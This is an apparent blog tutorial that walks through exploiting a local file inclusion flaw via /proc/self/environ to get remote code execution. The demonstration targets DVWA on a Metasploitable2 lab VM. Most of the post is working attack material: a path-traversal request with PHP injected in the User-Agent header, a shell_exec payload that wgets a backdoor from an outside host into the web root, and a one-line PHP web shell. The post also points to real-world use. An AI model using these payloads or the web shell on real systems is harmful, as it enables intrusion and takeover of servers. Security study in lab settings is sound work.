In this post we are going to see, how an attacker can exploit LFI vulnerability to to achieve code execution by the use of
What is /proc/self/environ LFI Method ?
In Linux based system the environment-variables of the current process (self) can be accessed via
/proc/self/environ. One of the environment-variables set (if apache2 is running) is the user-agent which can be controlled through a HTTP request. If the
/proc/self/environ file can be accessed through LFI, then in this case
RCE can be achieved by requesting the file in combination with the payload written into the HTTP User-Agent field.
GET lfi.php?file=../../../proc/self/environ HTTP/1.1 User-Agent: <?php phpinfo();?>
Now if an attacker sends the above http request to the web server then :
- First the data on User-Agent field will written on the
- Then the page request
lfi.php?file=../../../proc/self/environwill include the content of
/proc/self/environfile into the output page and our payload is get executed.
In this way a local file inclusion vulnerability can be leveraged to Remote Code Execution. Now lets see an example of it. For demonstration i am going to use Metasploitable2 VM with DVWA, You can download Metasploitable2.
In DVWA web application, we are going to use
File Inclusion page with
low security setting.
Now there is LFI vulnerability in
Now lets try to include
And it gets included in the output page, means it is also vulnerable to
/proc/self/environ attack. Now we just just have to modify the
User-Agent header field of the request body, and it can be done by using any browser proxies like Burp Suite, ZAP proxy or you can also use temper data plugin on firefox. I am going to use Burp proxy.
Now first we are going to check weather our injected code will execute or not, and for this the payload will be :
And our request body will be :
Response output :
And it works, means we successfully got executed our code on the web server. Now we are going to use the below payload :
<?php shell_exec('wget http://192.168.56.1:8000/shell.php -O /var/www/shell.php');?>
The above php code will download backdoor file
shell.php and store it on the web root directory (/var/www/), at here i am using a simple python http server to host backdoor file, in real world scenerio you can use the any web servers to host the backdoor file. The code used for php backdoor `shell.php is :
<?php $cmd = $_GET['cmd']; system($cmd); ?>
Now lets try the above payload.
Now lets try to access our backdoor.
And it works. In case if
User Agent field is filtered by web application, then you can also inject php code within